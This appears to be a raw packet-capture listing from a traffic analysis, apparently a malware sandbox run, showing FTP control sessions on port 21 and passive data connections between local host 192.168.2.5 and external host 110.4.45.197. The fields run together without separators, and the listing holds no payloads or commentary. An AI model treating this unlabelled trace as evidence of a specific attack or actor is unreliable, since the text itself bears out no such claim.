                                            Nov 4, 2024 10:14:44.126964092 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127013922 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127023935 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127041101 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127047062 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.127051115 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127062082 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127079964 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.127082109 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127095938 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127111912 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127121925 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127151012 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.127214909 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.131937981 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.131992102 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.132006884 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132055044 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132064104 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132078886 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132118940 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.132158995 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132169008 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132179022 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132193089 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.132241964 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.132263899 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132272959 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132281065 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132311106 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132350922 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.136833906 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.137108088 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.137141943 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.137196064 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.137273073 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.137283087 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.137660027 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.137669086 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.137677908 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.137855053 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.165601015 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.955656052 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:45.009160042 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:53.779392958 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:53.784493923 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:54.134797096 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:54.136173964 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:54.141423941 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:54.141547918 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:54.141563892 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:54.146795988 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.062520981 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.062829018 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.283584118 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.399821997 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:22.076407909 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:22.197941065 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:27.903599977 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:27.908607960 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:28.259224892 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:28.260075092 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:28.265052080 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:28.265127897 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:28.265204906 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:28.269996881 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.161972046 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.162292957 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.167279005 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167289972 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167301893 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167332888 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167363882 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.167387009 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.167431116 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167440891 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167481899 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.167509079 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167520046 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167567968 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.167613029 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167624950 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167663097 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.167663097 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.172230005 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.172271967 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.172283888 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.172287941 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.172328949 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.172353983 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.172377110 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.172380924 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.172401905 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.172425985 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.172878027 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.172970057 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.177272081 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.177328110 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.177499056 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.177876949 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.177925110 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.178278923 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.178324938 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.178378105 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.178538084 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.182331085 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.182939053 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.182986975 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.399832964 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:30.841465950 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:30.841900110 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:30.841958046 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:30.842664003 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:30.842757940 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:34.296973944 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:34.302050114 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:34.390192986 CET5000921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:34.395140886 CET2150009110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:34.396219015 CET5000921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:34.396219015 CET5000921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:34.401485920 CET2150009110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:34.401623011 CET5000921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:34.644059896 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:34.647950888 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:34.652858019 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:34.654119968 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:34.654119968 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:34.659035921 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.570746899 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.571065903 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.575968981 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576030970 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.576420069 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576430082 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576466084 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.576469898 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576479912 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.576483011 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576518059 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.576530933 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.576560020 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576570034 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576579094 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576589108 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576600075 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576610088 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.576637983 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.576658964 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.581733942 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.581746101 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.581779957 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.581800938 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.582283974 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.582294941 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.582324982 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.582334995 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.582345009 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.582353115 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.582355022 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.582376957 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.582391024 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.582412958 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.582412958 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.582444906 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.582469940 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.582990885 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.583028078 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.583564997 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.583596945 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.588175058 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.588197947 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.588345051 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.588387966 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.588419914 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.588468075 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.588768959 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.588810921 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.588841915 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.589157104 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.589201927 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.712479115 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:36.351334095 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:36.416100979 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:00.077168941 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:00.082107067 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:00.432797909 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:00.441010952 CET5001157320192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:00.445895910 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:00.450114965 CET5001157320192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:00.450118065 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:00.454978943 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.360764027 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.361093044 CET5001157320192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:01.365993977 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.366044044 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.366054058 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.366055012 CET5001157320192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:01.366065979 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.366076946 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.366092920 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.366113901 CET5001157320192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:01.366137981 CET5001157320192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:01.366149902 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.366158962 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.366163969 CET5001157320192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:01.366187096 CET5001157320192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:01.366211891 CET5001157320192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:01.366296053 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.366348982 CET5001157320192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:01.366381884 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.366429090 CET5001157320192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:01.370906115 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.370917082 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.370966911 CET5001157320192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:01.370985985 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.371040106 CET5001157320192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:01.371047020 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.371057034 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.371064901 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.371112108 CET5001157320192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:01.371143103 CET5001157320192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:01.371145964 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.371160984 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.371191978 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.371222019 CET5001157320192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:01.371249914 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.371339083 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.376007080 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.376142979 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.377310991 CET5732050011110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:01.377393961 CET5001157320192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:01.399857044 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:02.145546913 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:02.197006941 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:03.409333944 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:03.414235115 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:03.745415926 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:03.754019976 CET5001262073192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:03.759013891 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:03.760102987 CET5001262073192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:03.760102987 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:03.765043020 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.662096024 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.662329912 CET5001262073192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:04.667236090 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.667248011 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.667260885 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.667285919 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.667294979 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.667347908 CET5001262073192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:04.667366028 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.667396069 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.667404890 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.667412996 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.667474031 CET5001262073192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:04.667516947 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.668214083 CET5001262073192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:04.672233105 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.672244072 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.672272921 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.672282934 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.672298908 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.672307968 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.672311068 CET5001262073192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:04.672328949 CET5001262073192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:04.672347069 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.672383070 CET5001262073192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:04.672435045 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.672492027 CET5001262073192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:04.672514915 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.672540903 CET5001262073192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:04.673336029 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.677150965 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.677190065 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.677227974 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.677243948 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.677319050 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.677326918 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.677361012 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.677416086 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.677458048 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.677484989 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.677499056 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.677534103 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.678091049 CET6207350012110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:04.678162098 CET5001262073192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:04.712376118 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:05.405729055 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:05.480427980 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:11.626420975 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:11.794723988 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:12.144942045 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:12.145378113 CET5001365027192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:12.150228977 CET6502750013110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:12.152122021 CET5001365027192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:12.152189970 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:12.157049894 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:13.058892012 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:13.059165001 CET5001365027192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:13.067533016 CET6502750013110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:13.067542076 CET6502750013110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:13.067581892 CET6502750013110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:13.067589998 CET6502750013110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:13.067600012 CET6502750013110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:13.067620993 CET5001365027192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:13.067682028 CET5001365027192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.135646105 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.135730982 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.136004925 CET5749950019110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.136055946 CET5001957499192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.189801931 CET5001621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.259356022 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.264238119 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.614650965 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.615293026 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.620390892 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.620457888 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.620557070 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:29.625484943 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:29.893259048 CET2150016110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.104068041 CET5001621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.514843941 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.516930103 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.521857023 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.521877050 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.521928072 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.521936893 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.521984100 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.521985054 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.521997929 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.522015095 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.522022963 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.522028923 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.522033930 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.522080898 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.522090912 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.522157907 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.526870012 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.526880026 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.526887894 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.526904106 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.526911974 CET6000350020110.4.45.197192.168.2.5
